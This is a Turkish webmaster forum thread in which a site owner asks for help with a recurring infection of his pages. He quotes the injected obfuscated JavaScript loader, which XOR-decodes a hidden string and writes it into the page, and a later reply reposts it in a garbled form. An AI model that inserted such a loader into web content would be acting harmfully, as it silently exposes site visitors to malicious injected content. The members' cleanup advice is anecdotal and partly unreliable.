İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Bu nedir ?

Sinyor

0
İyinet Üyesi
Reaction score
15
http://www.gizligizli.net daha önce de belirtmiştim. nereden bulaştığını bilemediğim bi virüs bulaştı. kodu kaldırdım fakat tekrar girmiş.

<script language="JavaScript">e = '0x00' + '46';str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE%A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE%A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8%E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA%F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%FB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

şöyle bir kod atiyor. siliyorum bir gün sonra tekrar geliyor :( arkadaşlar buna nasil bi çözüm bulucam ?

disconnect

0
İyinet Üyesi
Onaylı Üye
Reaction score
5
Servera bulaştıysa yapılacak pek birşey yok. Tek çözüm format.

Sinyor

0
İyinet Üyesi
Reaction score
15
alakası yok... bu arada ben arkadaşın hosting sponsoruyum yapılacak tek şey kaspersky indirip virüs taraması yaptıkdan (diğer antivirüs programları bu virüsde pek işe yaramaz zaten büyük ihtimallede bulamazda)sonra bilgisayarınızdaki tüm html asp htm vs. uzantılı web dosyalarından bu kodu kaldırıp tekrar ftpnize atmak. format vs. vs. uzun işler ne kadar atarsanız atın ipiniz kayıtlıdır tekrar kapacaksınız... bu arada arkadaşa birisi ftpdeki bütün dosyaları indir virüs taraması yap sonra yine at dedi diye yazıyorum bu bilgiyi çok komikti :p

tiva

0
İyinet Üyesi
Reaction score
4
Bilgisayarınızda %90 %Temp% klasörünün içerisinde bir .exe , vbs bir dosya var (dosyanın türünü unuttum), sayfalara ie aracılığı ile bulaşıyor. 3 sene önce başıma gelmişti, şimdi tekrar virüs listesine baktım, galiba 2-3 ay önce bu virüs güncellenmiş, size bulaşan da yeni versiyonu olmalı. Virüsü silme işlemine başlamadan önce "Sistemi geri al (Disable System Restore)" özelliğini kapatmanız lazım.

Caesar

0
İyinet Üyesi
Reaction score
7
alakası yok... bu arada ben arkadaşın hosting sponsoruyum yapılacak tek şey kaspersky indirip virüs taraması yaptıkdan (diğer antivirüs programları bu virüsde pek işe yaramaz zaten büyük ihtimallede bulamazda)sonra bilgisayarınızdaki tüm html asp htm vs. uzantılı web dosyalarından bu kodu kaldırıp tekrar ftpnize atmak. format vs. vs. uzun işler ne kadar atarsanız atın ipiniz kayıtlıdır tekrar kapacaksınız... bu arada arkadaşa birisi ftpdeki bütün dosyaları indir virüs taraması yap sonra yine at dedi diye yazıyorum bu bilgiyi çok komikti :p

buna komik demişsin ama

kaspersky'den mi yapacam bunu

bu daha komik:)

Sinyor

0
İyinet Üyesi
Reaction score
15
Hahaha :) o sponsor ben mağdur :) öğrenmemek ayıp değildi hani :p

Turkmucit

0
İyinet Üyesi
Reaction score
0
Xp nin geri yüklemesinden bahsediliyor.Evet bilgisayarda geri yükleme işe yaramıyordu yardım dosylalarında "..geri yükleemeyi durdurun sonra ..." deniyordu .İng iyi olmadığından yanlış çevirdim diye yapmamıştım sonra format attım.
Demek geri yüklemeyi virüslerde kullanıyor Vaybe!

Loi

0
İyinet Üyesi
Reaction score
44
Lutfen VBS lock diye googleda arayin. Daha sonra temizleme yoluna gidin. Kolay gelsin.

qdin

0
İyinet Üyesi
Reaction score
1
http://www.gizligizli.net daha önce de belirtmiştim. nereden bulaştığını bilemediğim bi virüs bulaştı. kodu kaldırdım fakat tekrar girmiş.

<script language="JavaScript">e = '0x00' + '46';str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE%A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE%A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8%E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA%F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%FB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

şöyle bir kod atiyor. siliyorum bir gün sonra tekrar geliyor :( arkadaşlar buna nasil bi çözüm bulucam ?

Merhaba,
Kodun decoduda encode halinde

Kod:
<script language="JavaScript">e = '0x00' + '46';str1 = "ý¥®³Ù´µ¾¢úç³®´®% A7®®µ¾ÿ¡®¥¥¢«çûý® £·¦ª¢Ù´·¤ú硵µ©ÿ%E 8è¡¡¡ ö뤨ªèª¢«µè% E7Ù°®¥µ¡úöÙ¡¢® ¡µú öûý讣·¦ª¢ûý襮³%F B";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

Kendi algroritmasını oluşturmuş yüksek ihtimal edit bir sistem.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5